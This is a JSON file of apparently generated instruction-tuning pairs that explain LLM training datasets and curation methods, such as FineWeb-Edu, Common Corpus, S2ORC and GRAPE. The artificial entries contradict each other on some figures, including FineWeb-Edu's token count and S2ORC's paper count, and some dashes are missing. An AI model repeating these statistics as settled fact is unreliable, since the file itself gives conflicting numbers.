Files
RustAI_Full/output/index_cache.json
T
frostyripper1 ed7b31a69e updated
2026-06-17 12:39:42 +02:00

1 line
4.7 MiB
Plaintext
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
{"entries":[{"source":"english-master","instruction":"Explain what the 'brute-force approach' to training Large Language Models refers to, according to the document.","output":"The brute-force approach in LLM training means using massive, unfiltered web data without careful selection. It prioritizes quantity over quality, resulting in models that are statistically fluent (generate plausible text) but functionally brittle (fail at complex or subtle language tasks).","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain what FineWeb-Edu is and how its educational score filtering works.","output":"FineWeb-Edu is a dataset of 5.4 trillion tokens derived from FineWeb (which came from Common Crawl snapshots). It uses an automated educational quality classifier: first, the Llama-3-70B-Instruct model annotates 460,000 candidate texts with an additive score (0-5). Then a linear regressor built on Snowflake-arctic-embed-m embeddings predicts educational scores for all texts. Only documents scoring 3 or higher are kept, ensuring the model trains on structured, academically rigorous content rather than noisy web chatter.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain what the Common Corpus is and why it addresses the 'open data paradox'.","output":"The Common Corpus is a 2-trillion-token dataset (2,003,039,184,047 tokens) of permissibly licensed data. It solves the 'open data paradox' — the conflict between wanting open access to data and respecting copyright/ethical constraints — by meticulously sourcing public domain texts (classic literature, historical newspapers, government documents, legal case law) and documenting their provenance exhaustively. This allows LLMs to train legally and ethically while accessing high-quality, diverse English registers.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain what JFLEG is and how it differs from traditional grammar datasets.","output":"JFLEG (JHU Fluency-Extended GEC) is a gold-standard dataset for Grammatical Error Correction. Unlike traditional grammar datasets that focus only on isolated spelling or tense errors, JFLEG emphasizes holistic fluency edits. It requires the model to rewrite entire sentences so they flow naturally, teaching the LLM the rhythm, cadence, and idiomatic structuring of native-level prose rather than just fixing discrete mistakes.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain what CoNLL-U format is and how it helps LLMs understand complex sentence structure.","output":"CoNLL-U is a standard format for Universal Dependencies that provides explicit annotations across 10 distinct fields per token, including morphological features, part-of-speech tags, and dependency relations (e.g., subject, object, modifier). Training an LLM on CoNLL-U annotated data forces it to perform step-by-step reasoning over syntactic heads before predicting dependency labels. This prevents the model from relying on shallow pattern matching and instead requires it to map the exact grammatical relationship between every word in a sentence, enabling comprehension of highly complex, multi-clause structures.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain what the S2ORC dataset is and why it is important for achieving PhD-level English proficiency.","output":"S2ORC (Semantic Scholar Open Research Corpus) is an unparalleled dataset for academic training, comprising structured full text, abstracts, and metadata for over 10 million open-access English academic papers. It is critically important for PhD-level proficiency because it saturates the model with high-density scientific text — precise, unambiguous terminology, formal argumentation structures, and citation-dense exposition. Training on S2ORC expands the model's vocabulary to include expert-level discourse across disciplines, enabling it to generate publication-ready scientific prose rather than conversational approximations.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain what Chain-of-Thought (CoT) prompting is and how the CoT Collection trains LLMs to reason step-by-step.","output":"Chain-of-Thought (CoT) prompting is a technique that enables complex reasoning by forcing the model to explicitly generate intermediate reasoning steps before outputting a final conclusion. Rather than jumping directly from question to answer, the model produces a logical chain: 'First, ... Second, ... Therefore, ...'. The CoT Collection is a massive dataset containing 1.88 million CoT rationales across 1,060 distinct tasks. Continually fine-tuning on this collection instills a deliberate, multi-step problem-solving behavior that resists the urge to leap to linguistically coherent but logically flawed conclusions. This significantly enhances zero-shot accuracy on complex benchmarks like BIG-Bench-Hard.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain what the Philosophy-instruct dataset is and how it trains LLMs for abstract reasoning and wisdom.","output":"The Philosophy-instruct dataset is generated from the most significant philosophical texts available on Project Gutenberg, providing over 720,000 trainable tokens of multi-turn, instructional dialogue. Through continued pre-training and subsequent instruction tuning on these foundational texts, the LLM learns to navigate ethical dilemmas, construct Socratic dialogues, and weigh opposing viewpoints with intellectual maturity. This targeted exposure enables the model to transcend simple factual recall and provide deeply contemplated, balanced, and profoundly 'wise' answers to ambiguous human queries — precisely the capability that distinguishes a thoughtful scholar from a stochastic parrot.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain what the SARC dataset is and why it is indispensable for training sarcasm detection in LLMs.","output":"The SARC (Self-Annotated Reddit Corpus) is indispensable for sarcasm detection because it contains 1.3 million sarcastic comments scraped from Reddit, uniquely characterized by their heavy contextualization within preceding conversational turns. Sarcasm presents a unique computational challenge: the model must hold two contradictory semantic states simultaneously — the literal meaning of the text AND the intended, diametrically opposed meaning. Because sarcasm depends heavily on context and shared cultural knowledge, training on SARC forces the LLM to look beyond the immediate sentence boundary to analyze broader conversational history, speaker intent, and rhetorical patterns. Without this training, models interpret sarcastic statements literally, missing the pragmatic meaning entirely.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain what the Deceptive Humor Dataset (DHD) is and how it categorizes humor for LLM training.","output":"The Deceptive Humor Dataset (DHD) is a groundbreaking resource that categorizes humor into five specific archetypes: Dark Humor (jokes about taboo or morbid subjects), Irony (expressing meaning opposite to literal), Social Commentary (humor critiquing society or politics), Wordplay (puns and linguistic tricks), and Absurdity (illogical or surreal situations). Crucially, DHD grades each instance on a 'Satire Level' from 1 (subtle satire that may be mistaken for sincerity) to 3 (overt satire that is unmistakably humorous). Training on DHD allows the LLM to differentiate between a harmless phonetic pun and biting, deceptive social commentary that borders on misinformation. This granularity is essential for generating contextually appropriate humor without offending users or spreading deceptive content masquerading as jokes.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain what the Surge AI Profanities dataset is and how it categorizes offensive language for LLM training.","output":"The Surge AI Profanities dataset is a comprehensive resource cataloging over 1,600 English profanities and offensive terms. Each term is categorized by its semantic target — the type of offense it represents: sexual acts (e.g., explicit sex terms), bodily fluids (scatological references), physical attributes (body-shaming terms), or political offense (slurs targeting identity groups). More importantly, every term is graded on a severity scale from 1 (mild — casual swearing acceptable among friends) to 3 (severe — highly offensive terms that constitute harassment) based on human consensus ratings. By ingesting this structured data, the LLM learns the precise lexical weight and social consequence of each word, enabling it to distinguish between casual, acceptable banter among friends and severe, targeted harassment that should be filtered or avoided entirely.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain the four-stage data curation pipeline proposed in the document's conclusion for achieving world-class English proficiency.","output":"The document proposes a four-stage data curation pipeline. Stage 1: Foundational pre-training using FineWeb-Edu (5.4 trillion educationally filtered tokens) and Common Corpus (2 trillion permissibly licensed tokens) to build a pristine vocabulary and formal register while ensuring ethical compliance. Stage 2: Syntactic mastery through Grammatical Error Correction datasets (JFLEG, Lang-8), dependency parsing (CoNLL-U), and bridging anaphora training (GUMBridge) to achieve flawless, multi-clause grammar and paragraph-level cohesion. Stage 3: Cognitive reshaping using Chain-of-Thought Collection (1.88 million rationales), DeepResearch Bench (100 PhD-level tasks), and the GRAPE framework for distribution alignment — forcing the model to abandon shallow heuristics in favor of deep, step-by-step academic reasoning. Stage 4: Pragmatic fluency through literary corpora (Gutenberg, LiteraryTaste), sarcasm detection (SARC, PodSarc), humor understanding (Deceptive Humor Dataset), idiom comprehension (MAGPIE), and profanity mastery (Surge AI, Jigsaw) — elevating the model from a functional machine to a fluent, witty, native-like communicator.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain the updated token size and construction pipeline of FineWeb-Edu based on 2025 sources.","output":"FineWeb-Edu is a 1.3-trillion-token educational subset of the FineWeb corpus, which aggregates text from 96 Common Crawl snapshots. The pipeline includes: (1) extraction via trafilatura for HTML-to-text; (2) heuristic quality filters (terminal punctuation, duplicated lines); (3) per-snapshot MinHash deduplication with 5-grams; and (4) educational quality filtering where Llama-3-70B-Instruct annotates 460,000 candidates, a linear regressor on Snowflake-arctic-embed-m embeddings predicts scores 05, and documents scoring ≥3 are retained.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain the six principal collections of Common Corpus and their token distributions.","output":"Common Corpus comprises six principal collections: (1) Open Government (406 billion tokens) administrative, legal, and fiscal texts from sources like SEC, WTO, and EU documents; (2) Open Culture (886 billion tokens) digitized monographs, newspapers, and periodicals across 13+ languages; (3) Open Science (281 billion tokens) openly licensed scientific publications from OpenAlex, arXiv, theses, and clinical trials; (4) Open Code (283 billion tokens) permissively licensed code from Stack v1/v2 across 600+ programming languages; (5) Open Web (73 billion tokens) Wikipedia, Wikisource, StackExchange, and YouTube transcripts; (6) Open Semantic (68 billion tokens) natural language renditions of Wikidata in 300 languages. Total exceeds 2 trillion tokens across 517+ million documents.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain the S2ORC dataset's scale and what structured information it provides beyond raw text.","output":"S2ORC (Semantic Scholar Open Research Corpus) is a large corpus of 81.1 million English-language academic papers spanning many academic disciplines. It provides rich metadata (title, authors, year, venue), paper abstracts, resolved bibliographic references linking citations to their source papers, and structured full text for 8.1 million open access papers. The full text is annotated with automatically-detected inline mentions of citations, figures, and tables, each linked to their corresponding paper objects. This structure enables research on citation networks, figure/table extraction, and fine-grained scientific text mining.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain the CoNLL-U format and its 10-field annotation structure for universal dependencies.","output":"CoNLL-U (Computational Natural Language Learning Universal) is a tab-separated format with 10 fields per token: (1) ID token index; (2) FORM word form; (3) LEMMA base form; (4) UPOS universal part-of-speech; (5) XPOS language-specific POS; (6) FEATS morphological features (e.g., Tense=Past, Number=Sing); (7) HEAD index of syntactic head; (8) DEPREL dependency relation to head (e.g., nsubj, obj, amod); (9) DEPS enhanced dependencies; (10) MISC additional annotations (e.g., bridging anaphora). This structure enables explicit encoding of complete syntactic structure for each sentence.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain the core hypothesis and selection mechanism of the GRAPE framework for instruction tuning.","output":"GRAPE (which stands for the framework proposed in 'The Best Instruction-Tuning Data are Those That Fit') is a supervised fine-tuning (SFT) framework based on the hypothesis that SFT is most effective when the data aligns with the model's pretrained distribution. For each instruction, GRAPE gathers multiple responses from various LLMs (or human annotators), computes the probability of each response according to the target model's distribution, and selects the response with the highest probability. Standard SFT is then performed only on these probabilistically aligned responses, producing supervision that is distributionally well-matched to the model rather than imitative of an external teacher.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain what The Pile dataset is and its 22 diverse sources according to 2025 documentation.","output":"The Pile is an 825 GB English-language dataset combining 22 diverse, high-quality sources. Key sources include: PubMed Central (biomedical literature), arXiv (physics, math, CS preprints), GitHub (code repositories), USPTO (patents), FreeLaw (legal opinions), and PhilPapers (philosophy). The diversity of domains forces the model's embedding space to map highly specialized, domain-specific vocabularies, improving performance on academic question-answering tasks. The dataset excludes low-quality web text, prioritizing curated, professional sources.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Explain the ProX (Programming Every Example) framework and its sample-wise rule generation approach for data refinement.","output":"ProX (Programming Every Example) is a framework that treats data refinement as a code generation task. A lightweight 0.3B-parameter language model writes and executes small, targeted programs for every individual record in a dataset. These programs perform operations such as string normalization, HTML tag stripping, duplicate sentence removal, or regex-based pattern replacement. Unlike fixed heuristics applied uniformly, ProX generates record-specific cleaning logic based on the content of each document. This approach scales to massive datasets like C4 (750 GB), RedPajama-V2, and DCLM, producing a pristine corpus free of typographical noise and formatting artifacts.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does the author claim that a model trained with brute-force data is 'statistically fluent but functionally brittle'? Provide logical steps based on the text.","output":"Step 1: Brute-force training relies on sheer, unfiltered data volume from web crawls. Step 2: Such data contains noise, contradictions, and shallow patterns. Step 3: The model learns statistical correlations (fluency) but not true understanding of syntax, pragmatics, or reasoning. Step 4: When faced with complex English (e.g., philosophical arguments, bridging anaphora, sarcasm), the model produces coherent-sounding but logically or contextually wrong answers (brittleness). Hence, functional brittleness emerges from lack of deep linguistic structure in training.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does training on educationally filtered web data (FineWeb-Edu) improve MMLU and ARC scores more than raw web data? Provide a logical chain.","output":"Step 1: Raw web crawls include forums, personal blogs, and low-credibility sources with fragmented or contradictory information. Step 2: Educational filtering (score ≥3) selects texts that exhibit structured exposition, logical flow, and academic rigor. Step 3: Pre-training on such data teaches the model to recognize coherent argumentation and factual consistency. Step 4: MMLU and ARC benchmarks test multi-task understanding and reasoning — tasks that require structured knowledge. Step 5: Hence, the model generalizes better to these benchmarks, producing the observed 12% and 24% gains respectively.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does the document claim that including legal and financial data from Common Corpus helps the model achieve a 'formal, precise, and professional register'? Provide logical steps.","output":"Step 1: Legal and financial documents are characterized by high information density, precise terminology, conditional logic, and minimal ambiguity. Step 2: The Common Corpus includes 406.6 billion tokens from these domains (case law, patents, financial filings). Step 3: During pre-training, the model's embedding space learns the statistical and syntactic patterns unique to this register. Step 4: When the model later encounters a query requiring formal output (e.g., regulatory analysis, contract interpretation), it can seamlessly adopt that register. Step 5: Thus, exposure to legal/financial data directly enables a formal, precise, professional tone.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why is it important that an LLM understands the difference between native speaker errors and non-native speaker errors? Provide logical reasoning based on the text.","output":"Step 1: Native English speakers typically err on punctuation (e.g., comma splices), spelling (homophones like 'their/there'), and run-on sentences. Step 2: Non-native speakers typically err on determiners (a/an/the), articles, preposition usage, and subject-verb agreement. Step 3: If an LLM only trains on non-native corrections (e.g., learner corpora), it may overcorrect native-like informal writing. Step 4: If it only trains on native corrections, it may fail to understand systematic second-language errors. Step 5: Training on C4_200M (synthetic errors) plus Lang-8 ensures the model is robust against all forms of input degradation, making it capable of correcting both a native speaker's typo and a learner's article mistake.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does mastery of bridging anaphora serve as the 'definitive dividing line' between a mediocre LLM and an excellent one? Provide logical steps.","output":"Step 1: Bridging anaphora requires the model to infer unstated relationships between entities (e.g., 'door' belongs to 'house' without explicit restatement). Step 2: A model lacking this skill will either repeat the antecedent ('The house has a door. The house's door is red') or lose coherence entirely. Step 3: This results in disjointed, repetitive, or confusing paragraphs that fail to maintain logical flow. Step 4: A model trained on GUMBridge learns to maintain implicit referential chains across sentences without restating nouns. Step 5: This enables cohesive paragraphs where each sentence logically follows from the previous one. Step 6: Therefore, bridging anaphora mastery is the definitive dividing line between a model that merely generates sentences and one that writes coherent, deeply intertwined prose.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does expanding answer options from 4 to 10 (as in MMLU-Pro) eliminate the possibility of success through random guessing? Provide probabilistic reasoning.","output":"Step 1: With 4 answer options, random guessing yields a 25% baseline accuracy. Step 2: With 10 answer options, random guessing drops to 10% baseline. Step 3: However, the elimination is not just about probability — it's about distractor quality. Step 4: With only 3 distractors, it's easier to eliminate wrong answers using surface cues (e.g., length, keyword overlap, common phrases). Step 5: With 9 distractors, many will share surface features, domain vocabulary, and plausible phrasing with the correct answer. Step 6: A model relying on shallow heuristics (e.g., 'match the keywords from the question') will fail because multiple options match. Step 7: Only a model with deep conceptual understanding — not pattern matching — can reliably identify the correct answer among 10 highly plausible distractors. Thus, MMLU-Pro forces genuine graduate-level comprehension.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does aligning SFT data with the model's pre-trained distribution (GRAPE) produce better results than using more data? Provide logical steps.","output":"Step 1: A model's pre-trained weights represent a specific probability distribution over tokens — what it has learned about language from vast pre-training. Step 2: Traditional SFT often uses instructional data that is out-of-distribution compared to this pre-trained knowledge (e.g., different style, format, or reasoning patterns). Step 3: Out-of-distribution fine-tuning forces the model to override its learned representations, leading to catastrophic forgetting or degraded robustness. Step 4: GRAPE solves this by selecting, for each instruction, the response that best matches the model's existing probability distribution. Step 5: This preserves the model's core knowledge while adding instruction-following capabilities. Step 6: Because the model doesn't have to 'unlearn' or radically adapt, it learns faster and with less data. Step 7: Hence, a smaller model with GRAPE-selected data (1/3 the data, half the epochs) outperforms a baseline trained on 4.5x more unaligned data.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why is training on parallel stylistically distinct versions of the Bible (same content, different style) effective for teaching text style transfer? Provide logical steps.","output":"Step 1: Text Style Transfer (TST) requires the model to change the stylistic form of text (e.g., formal → casual, archaic → modern) while preserving semantic content exactly. Step 2: Most datasets lack ground-truth pairs where meaning is identical but style differs. Step 3: The Bible, however, exists in multiple stylistically distinct English versions (e.g., King James Version: archaic, formal; New International Version: modern, accessible). Step 4: Across these versions, the underlying semantic content (theological narratives, parables, teachings) remains identical. Step 5: This creates a perfect parallel corpus: aligned sentence pairs where meaning is constant but vocabulary, syntax, and register vary widely. Step 6: Training on this data (evaluated via BLEU and PINC metrics) teaches the model the precise mechanics of paraphrasing — which words can be substituted, which syntactic structures can be reorganized, and how to maintain semantic fidelity across radical stylistic shifts. Step 7: The model learns that 'he spake unto them' and 'he said to them' are semantically equivalent but stylistically distinct, enabling sophisticated rhetorical adaptation.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does sarcasm detection require the model to hold 'two contradictory semantic states simultaneously'? Provide logical reasoning with an example.","output":"Step 1: Sarcasm operates by uttering a statement whose literal meaning is the opposite of the speaker's intended meaning. Step 2: Example: During a torrential downpour, someone says, 'Beautiful day, isn't it?' Step 3: Literal semantic state: The speaker is asserting that the day is beautiful (positive evaluation of weather). Step 4: Intended semantic state: The speaker means the exact opposite — the weather is terrible, and they are complaining ironically. Step 5: To understand this utterance correctly, the LLM must simultaneously represent BOTH meanings in its activation space. Step 6: It must recognize the literal meaning (what the words say) AND the intended meaning (what the speaker actually means). Step 7: Then it must detect the contradiction between these two states and infer that the contradiction is deliberate, signaling sarcasm rather than error or confusion. Step 8: Models without this capability either (a) take the statement literally and fail to detect sarcasm, or (b) classify all contradictions as errors. Training on SARC teaches the model to maintain and compare these dual representations.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why do idioms present a 'semantic opacity' problem for LLMs, and how does varied contextual training solve it? Provide logical steps.","output":"Step 1: Idioms are semantically opaque — their meaning cannot be derived from the literal definitions of their constituent words. For example, 'spill the beans' has nothing to do with spilling or beans; it means 'reveal a secret'. Step 2: If an LLM sees an idiom only in one fixed context (e.g., 'He spilled the beans about the surprise'), it may memorize the pattern 'spill the beans' → 'reveal secret' without understanding the underlying mapping. Step 3: When it encounters a novel syntactic variation ('The beans were spilled by the whistleblower'), it fails because the pattern is disrupted. Step 4: MAGPIE solves this by providing each of 1,756 idioms across multiple, highly varied textual contexts — different syntactic positions, different surrounding vocabulary, different semantic domains. Step 5: By seeing 'spill the beans' in 30+ distinct contexts, the model abstracts the invariant non-literal meaning from the variable surface forms. Step 6: This forces genuine idiom comprehension rather than shallow pattern matching, enabling the model to understand 'the beans were spilled' as readily as 'he spilled the beans.'","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does the document claim that 'ignorance of profanity leads to a brittle, easily bypassed model' while 'total mastery of it allows for nuanced content moderation'? Provide logical steps.","output":"Step 1: An LLM trained without profanity data has no representation of offensive words in its vocabulary or embedding space. Step 2: Such a model cannot recognize profanity when it appears in user inputs — it sees 'f---' or 's--t' as unknown tokens or normal words. Step 3: Malicious users exploit this by using misspelled profanity, homophones (e.g., 'sheet' for 'shit'), or creative variations to bypass content filters. The model is 'brittle' because it fails at the exact edge cases it needs to catch. Step 4: Conversely, a model with total mastery of profanity (via Surge AI and Jigsaw) knows: (a) the exact lexical form of every profanity, (b) its severity score (1-3), (c) its semantic target, and (d) contextual indicators of hostile intent. Step 5: This enables gradient moderation: severity 1 in friendly context → allow; severity 1 in hostile context → warn; severity 3 → block entirely; identity-based hate → rewrite or refuse. Step 6: The model can also distinguish 'I f---ing love this' (positive emphasis) from 'You are a f---ing [slur]' (targeted harassment). Step 7: Thus, mastery enables nuanced, context-aware safety, while ignorance creates easily bypassed filters.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does the document claim that 'ignorance of profanity leads to a brittle, easily bypassed model' while simultaneously arguing that profanity datasets are essential for world-class English? Resolve this apparent paradox.","output":"Step 1: The apparent paradox arises from conflating 'knowing profanity' with 'endorsing profanity.' Step 2: A model ignorant of profanity has no representation of offensive words in its vocabulary — it cannot recognize them in user inputs. Step 3: This ignorance creates safety vulnerabilities: malicious users can use profanity to attack others, and the model cannot detect or moderate it. Step 4: Furthermore, the model cannot generate period-authentic dialogue for creative writing (e.g., a Quentin Tarantino script) or understand user intent when profanity is used harmlessly ('This is f---ing amazing!'). Step 5: A model with profanity mastery (via Surge AI and Jigsaw) knows: severity scores (1-3), semantic targets (sexual, scatological, identity-based), and contextual indicators of hostile intent. Step 6: This enables nuanced moderation: the model can block severe targeted harassment (severity 3, identity-based hate), rewrite milder profanity in formal contexts, and allow casual profanity in appropriate roleplay scenarios. Step 7: Thus, mastery enables ethical boundary adherence; ignorance enables neither safety nor authentic communication. World-class English requires understanding ALL registers — including profanity — so the model can navigate them appropriately, not so it can abuse them.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does the FineWeb-Edu classifier use a regression head on Snowflake-arctic-embed-m embeddings rather than a pure classification model? Provide logical steps.","output":"Step 1: Educational quality is a spectrum, not a binary label. Some texts are moderately educational (score 3), others highly educational (score 5). Step 2: A binary classifier would collapse this nuance, forcing texts into 'educational' or 'not educational' categories. Step 3: A regression head with a 05 output preserves granularity. Step 4: The classifier uses a frozen Snowflake-arctic-embed-m encoder and trains only the regression head for 20 epochs, preserving the embedding space's semantic richness. Step 5: After training, documents with scores ≥3 are retained as FineWeb-Edu. This allows flexible threshold adjustment and yields an 82% binary F1 score when thresholded at 3.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does Common Corpus include Open Code (283B tokens) when the document focuses on English proficiency? Provide logical steps.","output":"Step 1: English proficiency at a PhD level includes technical and mathematical English, not just literary or conversational registers. Step 2: Programming languages embody strict formal grammars, unambiguous semantics, and logical control flow — properties that mirror mathematical proofs and technical specifications. Step 3: Training on 283 billion tokens of code across 600+ languages exposes the model to variable naming conventions, comment structures, documentation strings, and error messages. Step 4: This cross-training improves the model's ability to generate and understand highly structured, unambiguous technical English. Step 5: Models trained on code data consistently perform better on reasoning tasks (MMLU, ARC) and mathematical benchmarks, directly supporting the document's goal of graduate-level English proficiency.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why is structured full text (with resolved bibliographic references) more valuable for PhD-level English training than plain abstracts alone? Provide logical steps.","output":"Step 1: Abstracts provide condensed summaries but lack the detailed argumentation, methodology, and evidence chains found in full papers. Step 2: PhD-level English requires understanding how scientific claims are supported — through experimental results, mathematical derivations, or citations to prior work. Step 3: Structured full text with resolved bibliographic references explicitly links each claim to its supporting evidence. Step 4: The model learns discourse patterns: 'As shown in Figure 3', 'consistent with previous findings (Smith et al., 2020)', 'therefore we conclude that...'. Step 5: By observing citation contexts, the model learns which claims require external support and how to integrate references naturally. Step 6: This produces a model that generates citation-dense, evidence-backed scientific prose rather than unsupported assertions.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does predicting part-of-speech tags before dependency labels improve parsing accuracy? Provide a cognitive reasoning chain.","output":"Step 1: Dependency parsing requires identifying which word is the root and how all other words relate to their syntactic heads. Step 2: Without POS information, the model must consider all possible head-dependent pairs simultaneously. Step 3: POS tags provide category-level constraints: only verbs can be roots, only nouns can be nominal subjects (nsubj), only adjectives can be adjectival modifiers (amod). Step 4: By forcing the model to predict POS tags first, it must commit to word categories before relations. Step 5: These POS predictions reduce the dependency search space: given a verb token, possible dependency relations include root, aux, xcomp; given a noun, possible relations include nsubj, obj, nmod. Step 6: This stepwise decomposition mimics how humans parse sentences: first identify word classes, then assign grammatical relations. Step 7: The result is higher accuracy and elimination of hallucinated relations that violate POS constraints.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does training on out-of-distribution SFT data lead to diminishing returns or performance degradation? Provide logical steps.","output":"Step 1: A pretrained LLM has learned a specific probability distribution over tokens from vast pretraining on diverse text. Step 2: Standard SFT data often comes from other LLMs or humans, producing responses that may differ stylistically, structurally, or factually from what the target model would naturally generate. Step 3: When the model fine-tunes on such out-of-distribution data, it must adjust its weights to assign higher probability to response patterns that are foreign to its learned distribution. Step 4: This adjustment can overwrite or degrade the original capabilities (catastrophic forgetting) and may produce brittle performance on tasks not covered by the SFT data. Step 5: GRAPE selects responses that the target model already assigns high probability to — these responses are 'in distribution' by definition. Step 6: Fine-tuning on in-distribution data requires minimal weight adjustment, preserving original capabilities while adding instruction-following. Step 7: Hence, GRAPE achieves superior results with less data, avoiding the diminishing returns of out-of-distribution SFT.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why does The Pile exclude low-quality web data in favor of curated sources, unlike FineWeb which includes filtered web text? Compare the two approaches.","output":"Step 1: The Pile and FineWeb represent two different philosophies for pretraining data curation. Step 2: The Pile selects only specific high-quality domains (PubMed, arXiv, GitHub, USPTO, FreeLaw) and explicitly excludes general web text. This guarantees quality but limits scale and diversity of writing styles. Step 3: FineWeb (and its FineWeb-Edu subset) includes web text from Common Crawl but applies filtering (educational scoring, heuristics, deduplication). This allows massive scale (15 trillion tokens raw, 1.3 trillion filtered) but risks residual web noise. Step 4: The Pile's approach is safer for domain-specific tasks (legal, medical, code) but may miss the linguistic diversity of web-written English (blogs, forums, news). Step 5: FineWeb's approach captures broader registers but requires more sophisticated filtering. Step 6: Optimal pretraining may combine both: The Pile for high-precision domains, FineWeb-Edu for general educational text, and Common Corpus for ethically licensed diversity.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Why is sample-wise rule generation (ProX) more effective than fixed heuristics for data cleaning at scale? Provide logical steps.","output":"Step 1: Web-sourced text contains diverse, document-specific noise patterns: some have HTML tables, others have LaTeX math, others have JSON snippets, others have multilingual sections. Step 2: Fixed heuristics (e.g., 'remove all HTML tags') apply the same transformation to every document, either missing noise (if the heuristic is too narrow) or over-cleaning (if too aggressive). Step 3: ProX treats each document as a unique case, generating a custom cleaning program for that document only. Step 4: The 0.3B LM examines the document content and writes specific rules: for a document with markdown tables, it generates table-flattening code; for a document with JSON, it generates JSON extraction code; for a document with LaTeX, it generates LaTeX-to-plaintext conversion. Step 5: Each program is executed, and the cleaned document is produced. Step 6: This sample-wise adaptation handles the long tail of formatting anomalies that fixed heuristics miss, producing a higher-quality corpus with fewer artifacts.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the main claim made in the first paragraph of the document about achieving world-class English proficiency in LLMs.","output":"To build an LLM with world-class English proficiency (graduate-level reasoning, grammatical precision, deep contemplation, and colloquial pragmatics), researchers must abandon the brute-force method of unfiltered web data. Instead, a paradigm shift toward meticulously stratified data curation is required to overcome the functional brittleness of statistically fluent models.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the empirical benefits of pre-training on FineWeb-Edu as reported in the document.","output":"Pre-training on FineWeb-Edu yields significant performance improvements: a 12% relative gain on the Massive Multitask Language Understanding (MMLU) benchmark, raising accuracy from 33% to 37%, and a 24% gain on the AI2 Reasoning Challenge (ARC), raising scores from 46% to 57%. These gains demonstrate that educational filtering directly enhances academic reasoning and factual consistency.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the domain-specific subsets of the Common Corpus and their linguistic benefits.","output":"The Common Corpus includes two key English subsets: (1) Open Culture with 885.9 billion tokens from classic literature, historical newspapers, and cultural heritage texts — preventing temporal myopia by teaching archaic vocabulary and classical sentence structures. (2) Open Government with 406.6 billion tokens from financial documents (Finance Commons) and legal case law (Legal Commons from Free Law Project, EUR-Lex, USPTO) — enabling the model to adopt a highly formal, precise, professional register for complex regulatory or economic subjects.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the key findings about the Lang-8 dataset and its role in grammatical error detection.","output":"The Lang-8 dataset contains over 2.3 million rows of language learner errors manually corrected by native speakers. Fine-tuning transformer models on cleaned iterations achieves an F1 score of 0.91 and 90.53% accuracy for Grammatical Error Detection. Critically, native and non-native speakers make different error types: native speakers struggle with punctuation and spelling, while non-native speakers struggle with determiners and articles. Training on Lang-8 ensures robustness against all error types.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize what bridging anaphora is and how the GUMBridge corpus trains LLMs to handle it.","output":"Bridging anaphora is a linguistic phenomenon where a newly introduced entity is understood solely through its relation to a previously mentioned, non-identical entity (e.g., 'There is a house. The door is red' — 'the door' is inferable as belonging to 'the house'). The GUMBridge corpus, a subset of the Georgetown University Multilayer corpus, spans 24 diverse English genres with granular annotations for bridging anaphora. Training on GUMBridge forces the LLM to develop deep contextual memory and complex coreference resolution skills, marking the dividing line between disjointed sentence generation and cohesive, logically flowing paragraphs.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the GPQA and MMLU-Pro benchmarks and how they evaluate graduate-level reasoning.","output":"GPQA (Graduate-Level Google-Proof Q&A) contains highly complex questions in physics, chemistry, and biology requiring deep subject-matter knowledge, calculation, and concept synthesis. These questions are explicitly designed to be unsolvable by simple search engines, forcing the model to rely on internalized academic logic. MMLU-Pro represents a significant escalation from the original MMLU benchmark: it includes 12,000 high-quality academic exam questions spanning 14 major fields, with answer options expanded from 4 to 10. This expanded distractor set eliminates random guessing or shallow heuristic matching, requiring extreme confidence and precision in knowledge retrieval.","created_at":1779361199,"tags":[]},{"source":"english-master","instruction":"Summarize the GRAPE framework and its efficiency benefits for instruction tuning.","output":"The GRAPE framework revolutionizes Supervised Fine-Tuning (SFT) by aligning instructional data with the model's inherent pre-trained probability distribution. For each instruction, GRAPE gathers responses from multiple sources (human annotators or larger oracle 